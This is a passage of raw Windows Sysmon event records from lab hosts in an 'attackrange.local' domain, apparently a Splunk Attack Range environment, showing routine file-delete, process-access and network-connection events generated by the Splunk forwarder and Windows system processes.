Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0768E35E9E8C3BA6F3EB15253B0C10EC,SHA256=7FDCAEE568C7C5999059ED23DDF5DEB1DDE392C2EE34C870F812BA1F8B445EC3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000440164Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:22:53.628{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4289FBC224CCFD2F0EB84B5BBC75D089,SHA256=F6D25F3D0029CCCE610FE58898B23FA195385F65077F64D0EB70AD7BFD0986A8,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000440163Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:22:53.120{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DA-6086-0B05-00000000BA01}4936C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440162Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:22:53.120{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DB-6086-0C05-00000000BA01}4248C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000440161Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:22:53.001{42DC5269-CE99-6086-1000-00000000BA01}364NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive0.datMD5=4C55959B6F1F0B1CA064A8A5BBCFCA85,SHA256=88EEDBC7597ED0C05261DCB4481CD608DF2812EBACCDF8C80E6B32D27C08A7CB,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000440169Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:22:51.686{42DC5269-CF43-6086-D800-00000000BA01}4100C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-932.attackrange.local62392-false10.0.1.12-8000- 23542300x8000000000000000440168Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:22:54.852{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1851ACAE9D34301B3CEF3DA70FF6D59E,SHA256=6FD38EF5A98A07CDA653D51479F9F005A6DB371409166817705D51ED570DFDBC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000291358Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:22:54.931{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=902387A019DB526C56E66A7312FDB31F,SHA256=A8735AA28404BAF595370AF7174FD565B92F2779D0A5A6BA03583DAC4AA99A93,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000440167Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:22:54.244{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=F5BDD477A1C6E47D1C15DA53D999D0F0,SHA256=2EFA18EFC6112F7DD60D71A313BFA26083663A4E7517E2FB4D0413090A6DA19B,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000440166Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:22:54.121{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DA-6086-0B05-00000000BA01}4936C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440165Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:22:54.121{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DB-6086-0C05-00000000BA01}4248C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000291359Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:22:55.946{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=75AF7F7A67105AE7BFD543282FCB6AC4,SHA256=479B0795475C93AE306407FB162F6D5E2117F65DA54D09189BB1581DC9F223B1,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000440171Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:22:55.122{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DA-6086-0B05-00000000BA01}4936C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440170Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:22:55.122{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DB-6086-0C05-00000000BA01}4248C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000291362Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:22:56.980{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2DA821AF5121CE9D9E9A90B3C78BE5AF,SHA256=CC0206E322A7E9408273131827B6948BF2169838AFCD2DD767A8409F7FFA4032,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000440174Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:22:56.123{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DA-6086-0B05-00000000BA01}4936C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440173Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:22:56.123{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DB-6086-0C05-00000000BA01}4248C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000440172Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:22:56.058{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B556AF19F68280A220656AAC15EE0A15,SHA256=BD73A4A69E69D038C10B332539FC5294163631449A175DD550A549C89FDDC725,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000291361Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:22:56.331{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=83CD8C27503BF1E377130F10EF056EF1,SHA256=EA1E2DA2D5DC6A2624819132C8A3F95B5B130249524C6FFC04CEABBDC9B8B784,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000291360Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:22:56.331{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=43A53D994900E56E1149F2F5281EF58C,SHA256=BA01E16FBE712D4F2932703F49D7DE9EC0CB36C92B14DBD4E270879480E89099,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000440177Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:22:57.289{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E01343D26E96AB70DAF35F8438ED0008,SHA256=52C6A1BED87F40EFA300E0A98AD4E5811124ECD6A50FCD82C24AB723EEDFDD51,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000291363Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:22:54.527{BEA10069-D145-6086-C700-00000000BB01}2620C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-96.attackrange.local50608-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 10341000x8000000000000000440176Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:22:57.124{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DA-6086-0B05-00000000BA01}4936C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440175Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:22:57.124{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DB-6086-0C05-00000000BA01}4248C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000440180Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:22:58.522{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0CB7FADF75BE384B578CBBBE0DCC1A41,SHA256=7922A05F29051B123F8888F961DEADDE6D344D80A6460224AD99D3C8328B95A4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000291364Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:22:57.999{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F59E02903EDF55F9C33E8400DEB631AB,SHA256=D19A3F5F485873280A87EC2E7B1DEB43D19EA21BACCCBB4B44671A595001043F,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000440179Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:22:58.125{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DA-6086-0B05-00000000BA01}4936C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440178Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:22:58.125{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DB-6086-0C05-00000000BA01}4248C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000440183Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:22:59.544{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=41E40D380A663DA5B1D87D5CD5AA8AA8,SHA256=42C6107C57223B4C64A0D7A8B85BFDE2A8D0CCD45530BBC14B5EE258394DC72C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000291365Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:22:59.013{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1C8F401DA8CC2376854AC2A85913C2CF,SHA256=DFA82DBE2D7CDE4460208F5E6A367CA94021BF7E5274279C296E5BEDDFA95BC5,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000440182Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:22:59.126{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DA-6086-0B05-00000000BA01}4936C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440181Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:22:59.126{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DB-6086-0C05-00000000BA01}4248C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 354300x8000000000000000440189Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:22:57.556{42DC5269-CF43-6086-D800-00000000BA01}4100C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-932.attackrange.local62393-false10.0.1.12-8000- 23542300x8000000000000000440188Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:23:00.610{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3628030C5821659F4274AD07153232D9,SHA256=DAC0FD959207D6E171852F43DB0A667EFF4E3C35125186C567446ED1518B0451,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000291366Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:23:00.014{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8400EAA4518A8DE0AE1A64E289D14BBB,SHA256=7CA105D7E6891E5C69153E59E5D9D8201DB56E1A1B160594063D412E63589E08,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000440187Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:23:00.127{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DA-6086-0B05-00000000BA01}4936C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440186Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:23:00.127{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DB-6086-0C05-00000000BA01}4248C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000440185Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:23:00.109{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=75D5E117A7A4A29A3BC3FE6FD844DA0B,SHA256=4521A0F65721CB40EF0C0DC6AC2E5179418556F620B27CE443B1624CA0ECB997,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000440184Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:23:00.108{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=90D373A2A236EA1E3D0A62804C7CF846,SHA256=1F131666290D890D9EE4F33417DD2CE157758D699E1860466AE5D865AAE2BBA0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000440192Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:23:01.631{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A770970000B5134A4D7C71E6DF077F1B,SHA256=9C6A4B1460E86B806E152B8571F639A580DA08FE1C7126BDDF32857517C93CA4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000291368Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:23:01.280{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=83CD8C27503BF1E377130F10EF056EF1,SHA256=EA1E2DA2D5DC6A2624819132C8A3F95B5B130249524C6FFC04CEABBDC9B8B784,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000291367Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:23:01.029{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6ED3E80BA555FBC360EA56B4940D4127,SHA256=8FD7186EBF0C5EE1FFB04C52123924CFB7D65FEE5F6A9C6BFE16EAF82D449F2F,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000440191Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:23:01.128{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DA-6086-0B05-00000000BA01}4936C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440190Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 